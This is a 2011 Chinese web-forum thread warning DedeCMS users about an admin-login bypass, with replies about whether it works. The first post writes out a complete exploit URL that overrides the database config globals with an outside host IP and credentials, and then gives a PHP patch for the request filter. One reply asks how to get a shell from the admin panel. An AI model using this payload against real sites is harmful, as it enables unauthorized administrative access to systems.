找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 222|回复: 23

用DEDECMS的注意了,赶紧修改后台地址

[复制链接]

6

主题

18

回帖

62

积分

注册会员

积分
62
发表于 2011-8-11 09:51:32 | 显示全部楼层 |阅读模式
http://www.xx.com/后台/login.php?dopost=login&validate=
dcug
&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

只要把验证码改为当前验证码,就能直接无密码进后台[ol]
  • 解决办法:
  • 找到include/common.inc.php文件,把
  •     foreach($_REQUEST as $_k=>$_v)
  •     {
  •         var_dump($_k);
  •         if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
  •         {
  •             exit('Request var not allow!');
  •         }
  •     }
  • 换成
  •     //检查和注册外部提交的变量
  •     function CheckRequest(&$val) {
  •         if (is_array($val)) {
  •             foreach ($val as $_k=>$_v) {
  •                 CheckRequest($_k);
  •                 CheckRequest($val[$_k]);
  •             }
  •         } else
  •         {
  •             if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
  •             {
  •                 exit('Request var not allow!');
  •             }
  •         }
  •     }
  •     CheckRequest($_REQUEST);[/ol]复制代码
  • 回复

    使用道具 举报

    277

    主题

    9230

    回帖

    1万

    积分

    论坛元老

    积分
    19343
    发表于 2011-8-11 09:52:04 | 显示全部楼层
    5.6貌似没这漏洞?
    回复

    使用道具 举报

    68

    主题

    890

    回帖

    2108

    积分

    金牌会员

    积分
    2108
    发表于 2011-8-11 09:55:43 | 显示全部楼层
    原帖由 geyunbing 于 2011-8-11 09:52 发表


    靠  又出bug
    回复

    使用道具 举报

    38

    主题

    3101

    回帖

    6360

    积分

    论坛元老

    积分
    6360
    发表于 2011-8-11 09:56:53 | 显示全部楼层
    给力啊
    回复

    使用道具 举报

    408

    主题

    3928

    回帖

    9222

    积分

    论坛元老

    积分
    9222
    发表于 2011-8-11 09:57:57 | 显示全部楼层
    dedecms后台怎么拿shell

    貌似这个漏洞 5.7 5.6 都提示 你的密码错误。

    [ 本帖最后由 xen 于 2011-8-11 10:20 编辑 ]
    回复

    使用道具 举报

    486

    主题

    4164

    回帖

    9892

    积分

    论坛元老

    积分
    9892
    发表于 2011-8-11 10:00:53 | 显示全部楼层
    原帖由 geyunbing 于 2011-8-11 09:52 发表


    靠  又出bug
    回复

    使用道具 举报

    574

    主题

    9763

    回帖

    2万

    积分

    论坛元老

    积分
    21406
    发表于 2011-8-11 10:01:02 | 显示全部楼层
    dedecms 未发现的bug应该还不少。
    回复

    使用道具 举报

    1556

    主题

    3万

    回帖

    8万

    积分

    管理员

    积分
    84464
    发表于 2011-8-11 10:01:53 | 显示全部楼层




    还好一直没用dede
    回复

    使用道具 举报

    19

    主题

    1482

    回帖

    3037

    积分

    论坛元老

    积分
    3037
    发表于 2011-8-11 10:03:06 | 显示全部楼层
    试过了,好像这个洞不行哦谢谢提醒。DEDECMS的BUG可真多
    回复

    使用道具 举报

    0

    主题

    1

    回帖

    4

    积分

    新手上路

    积分
    4
    发表于 2011-8-11 10:03:10 | 显示全部楼层
    沒用過
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|手机版|小黑屋|Discuz! X

    GMT+8, 2025-4-21 05:36 , Processed in 0.021083 second(s), 5 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表